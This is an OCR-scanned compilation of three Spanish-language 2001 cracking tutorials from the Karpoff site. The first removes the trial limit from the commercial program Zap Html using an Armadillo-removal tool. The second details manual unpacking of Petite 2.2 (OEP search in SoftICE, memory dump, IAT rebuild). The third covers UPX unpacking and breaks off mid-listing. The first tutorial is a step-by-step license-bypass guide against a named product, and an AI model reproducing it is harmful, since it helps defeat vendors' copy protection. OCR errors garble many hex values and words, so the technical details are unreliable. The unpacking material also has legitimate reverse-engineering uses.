Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
AREScama: Zap Html v x.xx 


PROTECCION: Limitacion de TIempo 

Objetivo: Quitar el Time Limite 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD: http://www.moonlight-software.com/ 

Herramientas: GetTyp 2.56 Armadillo Killer v 1.1 

CRACKER: Profesor_X FECHA: 15/04/2001 
INTRODUCCION 


Hola Amigos ..regreso despues de unos cuantos dias de descanso, me entraron las ganas de escribir otra vez 
(saludos KUATO THOR) y decidi hacer un tuto a honor de la empresa MOONLIGHT SOFTWARE la cual tiene 
una utilerias destacables como lo es EL webcrypt Y EL ZAP <HTML> este ultimo lo utilizaremos como ejemplo 
ao como podran ver aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta los siguientes 
parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El show de hoy estara a cargo de un programa que a mi parecer es bueno para quienes gustan de comprimir sus 
archivos html hasta en un 50% y asi hacer un poco mas rapida la descarga de internet de sus archivos html, yo 
en lo personal lo estoy enpezando a usar y me a dado buenos resultados... ya saben lo de siempre si les gusta 
el programa comprenlo...no me hago responsable del mal uso que alguno de los vivillos que abundan en 
internet hagan de este tutoria.l..... 


Objetivos 
1. Quitar el tiempo limite (veran que a veces es mas sencillo de lo que parece....) 


Manos a la Obra 


Bueno amigos empezemos con este caldo de olla! J EJ EJ EJ E)...... lo primero que haremos es analizar el programa para ver 
si esta empakado y en que lenguaje fue hecho, con la herramienta llamada GetTyp 2.56 y nos mostrara esto: 


Gell yp User Interface 1.14 - C:1Language 20001ge! type file analizeriglw. exe 


mmmm....como podemos ver esta protegido con Armadillo v 1.80 ..mmm ok continuemos abramos el programa y que es lo 
que vemos nos sale esta ventanita en la cual vemos que hay un contador, despues de 5 segundos se activa el boton de OK! 
mmmmm.. interesante.. 


¡Reminder 


y si vemos junto hay un boton que dice REGISTER ¡ejeje...interesante .. vamos y damos click en ese boton y nos aparecera 
esta ventanita siguiente: 


Register 


insertamos un nombre y numero de serie y damos click en OK y saltamos directamente a este mensaje : 


Eros! 


X 


jejejje!!! ahi esta el detalle, por ahi podriamos atacar, pero eso no me interesa por el momento, si volvemos a la 
ventana donde metemos el nombre y serial vemos un string en esa ventana que dice: 


Register 


HARDWARE FINGERPRINT: 23A1-8859 


bueno pues ese string significa que fue protegido con un serial creado por ARMADILLO , mmm.. seran tan tontos para 
solo protegerlo con el armadillo ?, ok verifiquemos , vamos y ejecutamos el ARMADILLO KILLER V 1.1 y nos 
aparecera la siguiente ventana: 


Select Armadilled de 


en la cual seleccionaremos el ejecutable del ZAP <HTML> y damos click en guardar y nos aparecera la ventana de 
registro del ZAP <HTML> en la cual daremos click en el boton de OK! y nos aparecera una ventana como esta: 


Save unpacked version as 


en la cual pondremos un nombre para el programa ya desempakado, que en mi caso dejare el que deja por default el 
ARMADILLO KILLER, damos en guardar y ahora si vamos a la carpeta donde se instalo el ZAP <HTML> y 
ejecutamos el programa desempakado ....y!!!!!!!!! jajajjjajajijaaaa , mi presentimiento se cumplio, los muy pencos solo 
protegieron con el armadillo sus aplicaciones, mmmmmm ... mal mal ...muy mal.......... Jejjejeje.. lo importante ya esta 
dicho nada de nags ni nada de limites... recuerden que este metodo solo es valido cuando no a terminado el periodo de 
prueba ...ahora si podemos decir..... 


PROGRAMA CRACKEADO......... 3) 
nO0TAS 
ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 


cometo errores, si encuentras uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
e [DeK_OiN ] 
e. Act MAgO 


e. ¡TeD 


e SIR DREAM 
e POTHEAD 
e VluGo 

e CrKViz 

e Txeli 

e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
PETITE 2.2 Desempakado Manual 


CRACKER: Andrik FECHA: 05/07/2001 


INTRODUCCION 


Hiez RaZal!!!!, como están, espero que bien, bueno, a continuación podrán leer un tutorial sobre desempacado de 
petite 2.2, este se basa en el método descrito por Metamorpher, ademas de explicaciones incluso para los que no 
son tan avanzados. Incluyo aparte de lo dicho por Metamorpher info que recabe, y otras cosas y quiza alguna que 
otra nota interesante. 


Este Tutorial lo considero y voy a tratar de hacerlo como las famosas series pa' torpecillos, lo cual no kiere decir 
ke lo seais, si no, que va a ir de la forma mas simple pa ke todos podamos comprender. 


Este Tut está dedicado al gran maestro Metamorpher, a Tangle in Sight, y a mi Amada KaRi (IcH LiEDE DiCh)!!!. 


Por Cierto, Karpoff, gracias viejo!!! sos de lo mejor. 


AL ATAKE 


Paso 1: Obteniendo el OEP. 


OEP, se refiere al punto de entrada del programa original, es decir, un programa cualquiera que sea, tiene un EP, o 
Punto de entrada, que es el lugar donde comienza a ejecutarse el código del progie, al someter los programas a 
cualquier rutina de encriptación o empakado, el EP del programa, pasa a ser OEP, o sea, Punto de Entrada Original (en 
inglés es Original Entry Point), y el EP es el del programa empakado, justo (en la mayoria de los casos) en la rutina de 
desempake/desencripción. 


Ahora que esta claro que es el OEP, pues hay varias formas de encontrarlo, El método propuesto por Tangle me ha 
parecido genial, aunke komo ha dicho Metamorpher, no es del todo seguro, asi que de todas formas, os los presento 
aká, y vosotros elegireís cual usar: 


Método Tangle (Wow Tangle, ya sos famoso): 

Este método se basa en que la mayoria de los compiladores comienzan el PEH (Portable Executable Header), es decir 
el encabezado PE de los archivos con un Manejador de Excepciones y luego un GetVersion. Por lo tanto, este método 
se basa en esto (según estudios de Tangle =0P), se logra de la siguiente manera. 


1. Fijar un bpx GetVersion. 

2. Ejecutar el programa. 

3. Cuando aparezca el SICE, presionar F12 para ir al código del programa. 

4. Si se sube la ventana de código un poco (ya sea usando el Mouse o CTRL+Cursor Arriba), se verá un Push EBP, el 
Manejador de 


excepciones, y la llamada a GetVersión, por lo tanto el PUSH EBP debe marcar el OEP del programa. Acá debo 
agregar que el OEP 

es la dirección marcada por el PUSH, no por el contenido de EBP, lo digo porque al principio, intenté seguir este 
método, y pensé 

que el OEP era dado por EBP, pero despues de mucho tiempo de examinar, me dí cuenta ke no erá así. 


Método Metamorpher o Método Rapido para encontrar el OEP de los programas protegidos con Petite 2.2 
(Lo único corto es el método, que este nombre, si ke la berta). 


Okas, este método propuesto por Metamorpher, se basa en su estudio sobre petite: 


1. Fijar un bpx GetProcAddress 

2. Correr el progie 

3. Cuando el SICE aparece, presionar F12 para regresar al código del programa. 

4. Aparecemos justo en la rutina de descompresión, se desactiva el breakpoint con bc* 

5. Ahora, se baja a través de la ventana de código, hasta encontrar una Call seguida de varios Ceros (0000). 

Nota. Encontre una CALL XXXXXXXX, y a la par en el lado izquierdo, aparecia E8 000000, por lo que supuse que 
esa era la Call a la 

que se referia Metamorpher, y efectivamente se ve, me aparecio luego de presionar CTRL+Page Down, en este 
momento debes 

fijar un bpm (ojo bpm, porque un bpx no funcionará). 

6. Presionas FS o CTRL+D, para que continue la ejecución del programa, en este punto, el SICE reaparecerá, y cuando 
lo hagas, 

encontrarás algo como esto: 

0167:004E003C 61 POPAD 

0167:004E003D 669D POPF 

0167:004E003F 83C408 ADD ESP,08 

0167:004E0042 E931D5F2FF JMP 0040B54F 

0167:004E0047 E9SOBSABBF JMP KERNEL32!_]lseek 


Y ahora, estamos hechos, ya que el primer jump que aparece es el OEP, ejo, pero que quede claro, la CALL, está en 
hex, no como CALL 000000 directamente. Y compañeros, el clavo del OEP está resuelto. 


Okas RaZa, esto es lo del OEP, y os juro que funciona, ahora, continuamos con lo dificil, esto es el volcado, so, let's go 
to the next step. 


Paso 2. Volcado del Exe. 


Hmmm, el volcado del exe, por que hacerlo? bueno, ese es el objetivo, hacer que el programa corra desempacado, y asi 
poder utilizar el dead listing, o mejor conocido como nuestro programa desensamblado, no se si les pasó, pero cuando, 
estaba tratando de encontrar el OEP, me pasaba que me phreakeaba, y no encontraba salida, y keria examinar el código 
en ensamblador (los problemas de de enamorarse del dead listing, ejejeje), pero que pasaba, tratabas de abrir el exe 
empacado, y se trababa el wdasm, el IDA no sé, y pues eso me ponia peor, entonces, el Volcado del exe se hace para 
poder tener mas control sobre el mismo. 


Bueno, el volcado del exe, se hace directamente de la memoria, por qué? bueno, porque es el unico momento en el que 
el archivo se encuentra desempacado, recuerdas que para eso era el OEP? bueno, pues si no, que ahora te kede klaro, 
para eso se usa, y bueno, esto es fácil, para lograrlo utilizaremos el ICEDUMP, existen otras utilidades para la misma 
tarea, pero kreo ke es mejor utilizar esta, se hace con Icedump y no con Procdump, simple y sencillamente porque 
estamos desempacando manualmente, ademas, no he visto que el procdump pueda desempacar petite 2.2. 


Bueno, antes de lograr el volcado, debemos averiguar otros parametros que nos ayudarán bastante a hacer esta tarea 
mas fácil, estos parametros son: La ImageBase, y la ImageSize. Si no estoy mal, debereis estar pensando: y como 
demonios lo consigo, tranquilos, es simple, abres procdump (ya me imagino a alguien diciendo, no que sin procdump 
pues, y la respuesta es: que en ningun momento dije ke no lo usariamos, dije ke no desempakariamos con él), utilizas 
la opción PE Editor, seleccionas el archivo ke kieres, en nuestro caso petite.exe, y voila! nos aparece una ventanita con 
los datos deseados, la ImageBase es de 400000, la mayor parte del tiempo, es 400000, aunke, komo toda regla, tiene su 
excepción, asi ke, es mejor siempre revisar esto, y apuntamos el Size of Image. 


Luego, debemos cargar el Icedump, dependiendo de la versión de Softlce que uses, ese es el ejecutable que debes 


correr, así, en mi caso, que yo uso SICE 4.05.334, y ese es el que ejecuto. Al hacer esto, nos aseguramos de haber 
cargado el ICEDump, y de que podres ser capaces de volcar el exe desempacado en tiempo real de la memoria. Bueno, 
ahora estamos listos para volcar el exe, esto se logra con el siguiente comando: /Dump [ImageBase] [SizeOflmage] 
cADumped.exe 


Fácil eh? bueno, pues aun faltan algunos datos, y otras cosas, esto van en el siguiente paso. 
Paso 3. Arreglo del tamaño de las secciones del Exe. 


Bueno, muchos debeis estar preguntandoos como y pa ke diantre hacer esto? cierto? bueno, la respuesta es: que esto se 
hace porque el tamaño de las secciones ha cambiado al volcar o descargar el exe, esto es a ke el exe empacado es mas 
pekeño, como acertadamente dijo Dek_Oin, un packer es como aplicarle winzip a un ejecutable, se comprime su 
tamaño. 


Bueno, al haber volcado el exe, el tamaño de las secciones es el tamaño de las secciones en memoria, es decir estando 
decompreso (acaso está bien dicho así, o soy un genio y volví a inventar una palabra =P), pero el tamaño ke aparece en 
el enkabeza PE es el del estado compreso. Para arreglarlo debeis de tener a mano un calculadora y empezar a teclear... 
Naaa!! son pajas, esto nos lo genera automaticamente PEDITOR de Yoda y MoD. 


Esto lo hacemos abriendo el programa, y luego click donde dice browse, seleccionamos la ubicación de petite, luego 
presionamos el boton de sections, lo cual traerá otra pantalla con todas las secciones del exe, luego hacemos click con 
el botón derecho del mouse, a cada sección, y seleccionamos la opcioón dumpfixer (Rs=Vs € Ro=V0), esto con el 
objeto de que el tamaño en memoria sea el mismo que el tamaño en el disco, esto porque el exe en el disco es una 
copia del exe ke teniamos en memoria. 


Ahora keda korregir, el Entry Point, esto se puede hacer a gusto, tanto en PEditor, como en ProcDump, en PEditor, se 
hace de la siguiente manera: 


1. Abrir el exe (od duh!). 

2. en la parte superior izquierda del programa, aparece un cuadro donde dice Entry Point, aquí es donde se debe 
escribir el OEP, recordando restarle la ImageBase, con lo cual, el EP es de D578, usad una calculadora, sirve cualkiera 
de las ke vienen kon los korn flakes, ejejeje, o si no, windows trae una, y hexworkshop también. 

3. Click en Apply Changes. 


Voila! ya lo arreglamos, es tiempo de cerrar el PEditor; hacerlo con el Procdump, es mucho mas fácil. 
1. Abrimos el exe. 

2. En la parte media de la ventana dice Entry Point, ponemos el D578 allí, 

3. Hacemos click en ok, y listo. 


Okas, komo dijo Metamorpher, si el exe empacado, fuera con upx, neolite, etc, ya tendriamos todo hecho, pero aún 
falta arreglar la IAT, o sea Import Addresses Table, o Tabla de Direcciones de Importación, Next Step. 


INTERLUDE: Okas, RaZa, como bien sabrán, hace unos días pase un mail donde decia que el PEditor no funcionaba 
bajo Win98 SE, bueno, pues despues de buscar mucho durante un par de horas, encontre la respuesta al enigma. Os lo 
explico a continuación: 


Un poco de BackGround: Hace unos días las ratas se comieron 3 mouses de los ke tenia en mi compu en la oficina, por 
lo kual empecé a utilizar el feature de win98 de KeyMouse, por lo cual ya me acostumbre a utilizar el teclado. Bueno, 
de aka parte mi descubrimiento. Como sabrán, o mejor dicho, como a muchos les habrá pasado, ke intentaro arreglas 
las secciones y ni procdump, ni PEditor les funcionó, yo mande un mail a la lista, pero, descubri tambien la solución, 
me tomo cerca de 2 horas. 


La solución, es, hacer click en el area donde van las secciones, y como ninguna tiene nombre, pues (aka viene el poke 
fue interesante usar el keymouse, ya ke me acostumbre a usar teclas, ademas, fue casi sin kerer ke deskubrí esto), en 
win98 FE, al hacer click en el area donde podría ir el nombre, lo selecciona, y todo listo, pero el SE, no, asi ke al haber 
hecho click, empezamos a presionar la flecha hacia abajo, y cuando vemos, se ha seleccionado alguna sección, bueno, 
magía? nope, pero la verdad, no se poke en FE sale todo el nombre de la seccion, pero en NE, tenemos poco espacio 
(casi solo el espacio de un caracter) para marcar el nombre de la sección. 


Ahora, ya podremos arreglar las secciones. 


Paso. 4. Reconstrucción de la IAT 


Bueno, estamos a muy poco tiempo de Acabar con la vida de Petite 2.2, Okas, un poco de Info acerca de nuestro 
enemigo, recuerdas el lema: "Mientras más conozcas de tu enemigo, mas fácil te será vencerle"” y ademas "No 
Knowledge that, is no power". Bueno, a lo que voy es que Petite encripta la TAT del exe original, y luego la va 
desencriptando en tiempo de ejecución (RunTime) a menida que se hace necesario conseguirlas. 


Okas, si recuerdan el titulo, es desempacado semi-manual, ya que no todo lo hacemos manual, uno de los métodos 
propuestos y un tanto viejos, es usar el hackers view, wdasm o incluso el sice (con el exe volcado) para encontrar la 
IAT, y se rastreaba hasta encontrar algo al estilo: " JMP PTR [XXXXXXXXX]". Donde como ya sabrán, las X 
representan una dirección que es puntero, luego ir a ver el offset correspondiente , luego ver donde comienzan y donde 
terminan (personalmente no lo he practicado). 


Bueno, hay programas que hacen muchas cosas por nosotros, y eso nos alimenta la hueva, y bueno, uno de estos 
programas es el Import Reconstructor. Supuestamente hace lo mismo que el revirgin, pero cuando lo tratamos de usar, 
sinceramente deja mucho que desear, asi ke lo único ke realmente nos interesa es la opción de buscar TAT. 


Esto se hace seleccionando el archivo del ke keremos averiguar la TAT en la lista ke nos aparece en la parte superior de 
la ventana, y es alli kuando el proceso comienza, es algo tardadito, por lo ke sería bueno sentarse y esperar, despues de 
un rato, luego vemos donde dice OFP, allí ingresamos nuestro OEP, luego le damos click al botón IAT AutoSearch, 
acá aparece un mensaje, en la casilla RVA aparece 00013FFC, lo cual es la RVA de la IAT, donde Dice Size, aparece 
0000020C, este es el tamaño de la IAT. Ahora podemos cerrar este progie y checar el Revirgin. 


Según lo recomendado por Methamorpher, es buena idea tener cargado el IceDump, ya que tiene la mágica propiedad 
de corregir algunos problemas de incompatibilidad de la IAT al ejecutar el exe en otro PC que no es en el que lo 
volcamos. Okas, de aquí en adelante, viene el uso del Revirgin. 


Para acoplar el proceso de corrección de la IAT, corremos el archivo que desempacamos, y luego revirgin, buscamos 
nuestro archivo en la lista que aparece en el lado superior izquierdo de nuestra ventana, bajo el título Procedure, 
seleccionamos el archivo que queremos, en este caso petite o petgui, parece como que si se estancará, pero esta 
pensando, y luego nos dice que la IAT está corrupta (o corrompida como diría alguíen mas), le damos aceptar; 
quitamos el check de Autofix Sections+IT paste, debido a que su funcionamiento deja mucho que desear. En IAT 
START RVA escribimos lo que nos tiró el Import Reconstructor, el cual es 00013FFC y en el apartado de IAT SIZE 
idem (o sea, lo mismo), en este caso 0000020C. 


Ahora nos toca presionar el botón IAT Resolver, se queda colgado un rato, y en la tabla que aparece a nuestro lado 
derecho, y vemos que han aparecido algunas importaciones, parece ser que esto está funcionando, aunke kedan 
algunos espacios en blanco, por lo que repetimos el procedimiento, esta vez con Resolve Again, y ha conseguido todas 
las importaciones. Ahora lo que resta, es indicarle al Revirgin, donde diantre queremos que resida nuestro RVA, esto 
se hace con el fin de generar una IAT correcta, y ya que nosotros lo que vamos a hacer es meter la TAT al final de 
nuestro archivo, donde dice IAT RVA, escribimos el SIZE of IMAGE, que en el caso de petgui es E1000. 


Es en este momento en que generamos la IAT, esto al presionar el metagrandioso IAT Generator, grabamos el archivo 
como iat.bin, y lo que tenemos en este momento es una Tabla de Importaciones perfecta; antes de cerrar el Revirgin, 
debemos apuntar el nuevo tamaño de la IAT, el cual reside en ([AT Length), para nuestro pequeño fichero es 
000000B8; ahora resta meter la nueva IAT en nuestro archivo, lo cual constituye el siguiente paso. 


Paso 5. Incluir la IAT en el fichero. 


Damnit, no se como empezar, bueno, dejemoslo en que lo que queda es tomar esta IAT, colocarla en el exe que 
volcamos con IceDump, luego modificar el encabezado del exe para que sepa ke la IAT ahora queda incluida en 
E1000. 


Bueno, para comenzar con el último paso de la "Solución Final" (ejeje, me llama la atención esta frase, fue dicha por 
Herr Adolf Hitler; Por cierto, no soy Nazi, sino me llama la atención estudiar la vida de muchas personas), debemos 
crear una nueva sección en el ejecutable, que es el lugar donde residira nuestra pequeña maravilla, es decir, la TAT, 
luego corregir el PE header. 


Abrimos Procdump, vamos a su PEeditor y seleccionamos el exe volcado, clickeamos el boton sections, y nos aparece 
una ventana que contiene los nombres de las secciones, click derecho y seleccionamos Add Section, debemos 
especificar un nombre de sección, el que querrais, por ejemplo, Meta, IchLiebeKari, GoLeE, GcK, etc, etc, etc. luego 


se crea la sección, debemos indicar cual será el tamaño de la misma, ahora imagino que mas de alguno estará 
pensando: "Como demonios saberlo?", la respuesta es simple, ya que es mejor tener espacio de sobra, asignemole 2 kb 
(sugerencia de Metamorpher), y luego incluimos la IAT, Pregunta lógica +1: Cómo se hace?. Respuesta lógica +1: 
hacemos click con el botón derecho sobre nuestra nueva sección, escogemos la opción Edit Section, y escribimos (o 
editamos, como prefieran llamarlo), PSize=2000 ; VSize=2000 >; RVA=000E1000 ; Offset=000E1000. Pregunta lógica 
+2: Ejo viejo, porque tales numeros?. Respuesta lógica +2: es lo mismo que corregir los valores de las secciones, PSize 
es el tamaño de la sección en el disco, y VSize su tamaño en memoria, es decir, tamaño físico y tamaño virtual, y ya 
que nuestro exe fue volcado directamente de la memoria, nuestro tamaño físico == tamaño virtual. Luego, RVA == 
Offset, porque al hacer el volcado de memoria, los offsets corresponden a los RVAs. 


Okas, ya que tenemos hechos todos los cambios de la nueva sección, presionamos OK, y la nueva sección está lista. 
Nos resta actualizar el SIZE of IMAGE de nuestro archivo, akí viene la Pregunta Lógica +3: Por qué?. y la 
correspondiente Respuesta Lógica +43: Recuerdan que antes, el SIZE of IMAGE era E1000, bueno, pero como 
acabamos de agregar una nueva sección, y su tamaño era de 2 kb, se los sumamos, por lo tanto, haremos esto: E1000 + 
2000 = E3000, por lo tanto lo actualizamos así, y casi hemos concluido. 


Ahora resta indicar en la cabecera que la IAT empieza en E1000, que es el comienzo de nuestra nueva sección, esto lo 
hacemos nuevamente con el ProcDump, hacemos click en Directory, luego vemos que en el segundo recuadro sale 
Import Table = 000E01D8, akí es donde indicamos que la IAT yace ahora en 000E1000, también debemos modificar 
el tamaño de la IAT (recordaís que lo apuntasteis en el paso anterior), ProcDump indica que el tamaño de la IAT sea 
000001CA, pero nosotros lo cambiamos a 0O0000B8 y ya está, por lo tanto, presionamos OK, y OK otra vez, y con 
esto acaba nuestro trabajo con ProcDump. 


Bueno, veamos, lo que queda es pegar la nueva IAT, para esto podemos usar HexWork Shop, HIEW, etc, en HexWork 
Shop abrimos nuestro archivo volcado, y tambien el IAT.bin que nos generó Revirgin, seleccionamos todos los bytes 
del IAT.bin, presionamos las bien amadas teclas de copiado (CTRL+C), pasamos al final del Archivo volcado, que 
supuestamente es el Offset E1000, presionamos las teclas de pegado (CTRL+V), y ya tenemos la IAT en nuestro exe. 


Pregunta Lógica +4: Por qué diantre creamos una sección de 2 kb, si la IAT ocupa mucho menos que eso?. Respuesta 
Lógica ++4: esto se debe a ke si la creamos de solo 1 kb, tendremos ke trabajar mas (como diría mi maestra de mate del 
bach, Por la ley del mínimo esfuerzo), pues tendriamos que reeditar las propiedades de la sección si la IAT okupara 
mas de 1kb, y apoyando lo dicho por Metamorpher, mejor que sobre y no que falte. 


Según estadisticas de Metamorpher, el 99% de la raza (ojo, raza != de RaZa), en este punto, graba el archivo, y lo 
ejecuta, pero como nosotros somos RaZa, debemos dejar las cosas a la perfección, o al menos, lo mejor posible, 
entonces, ya que la sección está declarada con 2 kb, hay que llenar el resto con 0's, y nuevamente, la ley del mínimo 
esfuerzo se aplica, buscamos un area con muchos 0's, y aplicamos la maravillos combinación: Copy d Paste, hasta 
llegar al final de la sección, es decir en el offset E3000. si se pasan, deberán borrar los 0's que se pasaron. 


Okas, That's all, terminamos, acabamos, etc, ahora sí, es hora de grabar el archivo, Ejecutamos el archivo, y........ 
Damnit!!! si corre, si corre!!, ajajaja, pues hemos desempacado semimanualmente un archivo empacado con petite 2.2. 


Bueno, esto es con petgui, que es una linda ventanita, pero como diablos desempacar petite.exe, ya que va en la tipica 
forma de ventanita de DOS que se cierra, Pregunta lógica +t5: Si el programa se cierra, como le hago para conseguir la 
TAT, ya que revirgin necesita que el proceso esté ejecutandose?: el procedimiento es exactamente el mismo, lo 
diferente es que cuando tengamos el exe volcado en el OEP, despues de usar el metodo para llegar al OEP, cuando 
estemos en el salto que nos lleva al OEP, justo en ese momento, telceamos una a (una letra a) en la línea de comando 
del SICE, y damos enter (esto lo que hace es que nos deja ensamblar instrucciones), escribimos "jmp eip" y 
presionamos enter, luego ESC para salir de esta opción, y Voila! podemos presionar CTRL+D para salir del SICE. 
Esto evita que el progie se cierra, y esta cargado en memoria, completamente decompreso. Lo que hicimos, fue dejar el 
programa en un Loop, o bucle, el jmp eip hace que salte a donde apunta el registro IP, que es lo que indica la siguiente 
instrucción que se debe ejecutar, y conseguimos hacer que el programa entre en un LOOP infinito, y continuará en esas 
instrucciones permanentemente. Ahora se repite el procedimiento para Petgui. 


Esta tecnica es la misma que se usa para el desempacado de Dlls empacadas. 
Despedida: 


Buena RaZa, eso es todo por hoy, ya son las 22 horas, y tengo sueño, mis hermanos deben terminar tareas, y mañana 
es día de universidad, trabajo, etc, lo bueno, es ke hemos culminado con petite. 


Saludos a todos, en especial a Metamorpher, mi amigazo Rehostia Karpoff, al profe, a LSW, y a mi bienamada KaRi, 
suerte y saludos, 


sugerencia, criticas, apoyo, goleeuvhotamil.com. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Desempakando Manualmente  UPX 

PROTECCION: EMpakador UPX 

Objetivo: Desempakar UPX 

Descripcion: 

Dificultad: Newbie 

DOWNLOAD: 

Herramientas: Softlce, Procdump, Un-Pack v2.1 (opcional) 

CRACKER: Rul FECHA: 13/08/2001 
INTRODUCCION 


En este tutorial (n* 4) voy a tratar de explicaros de forma un poco chapucera, como es tipiko en mi, como funciona un empakador en 
este caso UPX aunke si os gusta y tal intentare haser un tute para cada empakador (Aspack, PeCompact, etc..) 

El metodo es muy sencillo, por lo tanto no es perfecto, porque el ejecutable que obtendremos no tendra la tabla de importaciones, 
pero vamos.... Ya aprendere ;-) y actualizare el tute. 


NOTA: (Para los ejemplos de este tute utilizare uno de los keygen ke he echo, pulsa aki para bajarlo) 


AL ATAKE 


2 - ¿Como sabemos que nuestro "objetivo" esta empakado? 


Parece una cosa estupida, pero.... ¿Como piensas desempakar un archivo sin saber si lo esta o no?. Bueno hay varias 
formas: 


2.1 - Procdump 
Es una forma de ver que nuestro archivo esta empakado, darle a PE Editor y abrid un exe cualquiera. Mirar Sections y fijaos 
ke aparece lo siguiente (o parecido): 
CODE 


DATA 
BSS 
.idata 
ts 
.rdata 
.reloc 
.rsre 


Pues ahora haz lo mismo con mi keygen, y observa: 
.UPXO 
.UPX1 
.Fsrc 


Umm parece una pista fiable de ke esta empakado (casi seguro) con UPX (no tan seguro), os digo esto porque el nombre de 
las secciones puede cambiarse ):-) (no es este el caso pero que sepais que se puede hacer). Vamos a ver otra forma de 
saber si esta empacado y con que compresor. 


2.2 - Un-Pack 
Este es un progamilla muy util, ya que nos indica de forma fiable con que compresor esta empacado un archivo, y si no lo 
esta nos dice que lenguaje se ha utilizado. 
Aparte de eso lleva un monton de unpackers. 


Bueno su uso es muy simple, en una ventana de MS-DOS o mediante un .BAT escribir lo siguiente un-pack 
cipathinombre.exe 
Al hacerlo sobre nuestro programa sale lo siguiente 


* Packed by UPX v.0.76.2-1.?? by Markus F.X.J. Oberhumer 4% Laszlo Molnar 
* Use UPX with -D option for unpack 
* Use ProcDump v.1.6 by G-RoM, Lorian 8 Stone //UCF for unpack 
* Executable file extension 
* Trust me, I know what I'm doing... 


:) Esto aclara nuestras sospechas sobre el empacador usado. 


2.3 - Otras pistas..... 
Hay otras cosas que nos pueden hacer sospechar que nos encontramos frente a un archivo comprimido: 
- Al intentar desensamblarlo con W32Dasm no nos sale nada o simplemente cosas sin sentido 
- Al intentar cargarlo con el Softlce Symbol loader, no rompe al principio del codigo (Entrypoint) 


3 - Algo de teoria 


Aqui voy a tratar de explicar un poco por encima, ya que no soy ningun experto en el tema (Si alguien se anima a colaborar 
email-me), como funcionan estos compresores. 


Para que un archivo comprimido pueda ser ejecutado, primero tiene que estar desencriptado, si no el ordenador no lo 
"entiende" asi que podemos distinguir varias partes en un archivo de este tipo: 


1- Una rutina sin ecnriptar que se encarga de descomprimir el ejecutable a memoria. 
2- El programa en si mismo encriptado. 


Una vez que la rutina ha descomprimido el ejecutable a memoria, salta al principio de codigo desencriptado y se ejecuta de 
manera normal, este proceso se repite cada vez que se ejecuta. 
Estas "rutinas de descompresion" suelen tener la siguiente estructura: 


PUSHAD // 60 


POPAD // 61 
JMP 00xxxxxx // Salto al principio del codigo desencriptado o 
OEP (EntryPoint Original) 


Voy a explicaros teoricamente como abordaremos a la hora de desempacarlo manualmente: 
1- Localizar el salto al OEP 
2- Cambiar ese salto por JMP ElP (Asi creamos un bucle infinito) Con lo que tendremos el ejecutable desencriptao en 
memoria 
3- Dump (Volcado) de Memoria en un ejecutable 


Visto esto yo creo que estamos listos :) 


4 - La Practica 


¿Asustados? Pos no os precupeis que todo esto suena muy complicado pero no lo es tanto. 


Como he dicho antes lo primero que hay que hacer es localizar el salto al OEP, pues bien vamos a ello. 
Cargar el keygen en el Softlce Symbol Loader, darle a Load y ...... !! pero ke pasa !! El programa se ha ejecutado 
directamente, Softice no ha saltado al principio del codigo como suele hacer. Vamos a apañar esto :) 


Abrir ProcDump y darle a PEeditor -> Sections y sale lo siguiente: 


Sections Informations : 


Name (VitualSize | VitualOlfset | RawSize_ | RawOlfset_ | Characteristics | 
UPXO 00027000 00001000 00000000 00000400 EUOODOSO 
LUPI 00018000 00028000 00017E00 00000400 EO0ODD4O 
sto 00001000 00040000 0DOOOCOO  DO018200  COO00DAO 


La culpa la tiene el campo Characteristics de las secciones UPXO y UPX1 
Tenemos que cambiarlas las dos, Yo no soy el mas indicado para explicarlo exactamente, asi que si quereis saber mas os 
recomiendo el tute sobre Encabezados PE de numIT_oR podeis encontrarlo en http://welcome.to/karpoff 


Pues eso tenemos que cambiar esos campos por E0000060. 
Boton derecho encima de cada uno de ellos y Edit Section 


Modify section value 


Section informations 


Name jurxo 
VSize [00027000 Aya [00001000 


PSize [00000000 Difset [00000400 
Section Characteristics : [£oooo0s0 


Con lo cual es aspecto final queda tal que asi: 


r Sections Informations : 


[Name T Vitual Size — | Vitual Dif Fiaw Dic 


UPXO 00027000 00001000 00000000 00000400 ED000060 
uUPx1 00018000 00028000 00017E00 00000400 EDO00060 
ISI 00001000 0040000 OOODOCOO 00018200 Co000040 


Pues ahora lo intentamos otra vez con el Symbol loader y ahora si que funciona :) 
Entramos en la siguiente linea: 


015F:0043FC40 60 PUSHAD 


Como tenemos que buscar el Salto al OEP y este suele encontrarse debajo de la instruccion PUSHAD escribimos: 
S 00xxxxxx | FFFFFF 61 // Ojo que queremos buscar la instruccion 61 no el texto ' 61' 


A lo que Softlce nos responde: Pattern Found at 0030:0043FD96 Asi que ni cortos ni perezosos nos dirigimos alli 
directamente ( a veces no lo encontramos a la primera y hay que hacer mas busquedas ) escribimos g 0043FD96 y nos 
encontramos con lo siguiente: 


015F:0043FD96 61 POPAD 
015F:0043FD97 E9E864FEFF JMP 
00426284 


